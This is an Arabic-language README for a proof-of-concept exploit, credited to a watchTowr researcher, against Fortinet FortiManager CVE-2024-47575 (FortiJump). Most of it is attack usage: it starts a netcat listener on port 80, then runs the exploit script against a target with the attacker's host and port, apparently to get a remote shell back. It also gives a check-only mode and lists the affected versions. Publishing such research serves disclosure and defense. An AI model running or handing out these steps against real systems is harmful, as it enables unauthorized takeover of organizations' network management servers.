
Fortinet Fortimanager تنفيذ تعليمات برمجية عن بُعد دون مصادقة، المعروف أيضًا باسم FortiJump CVE-2024-47575
Fortinet FortiManager تنفيذ تعليمات برمجية عن بُعد دون مصادقة، المعروف أيضًا باسم FortiJump CVE-2024-47575
راجع منشور مدونتنا للتفاصيل التقنية
للبدء، أنشئ جلسة ncat الخاصة بك:
nc -lvvnp 80
ثم نفّذ مولّد قطع الكشف لدينا:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
للتحقق من وجود الثغرة فقط، استخدم الخيارات التالية:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
تمت كتابة هذه الأداة بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)
لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr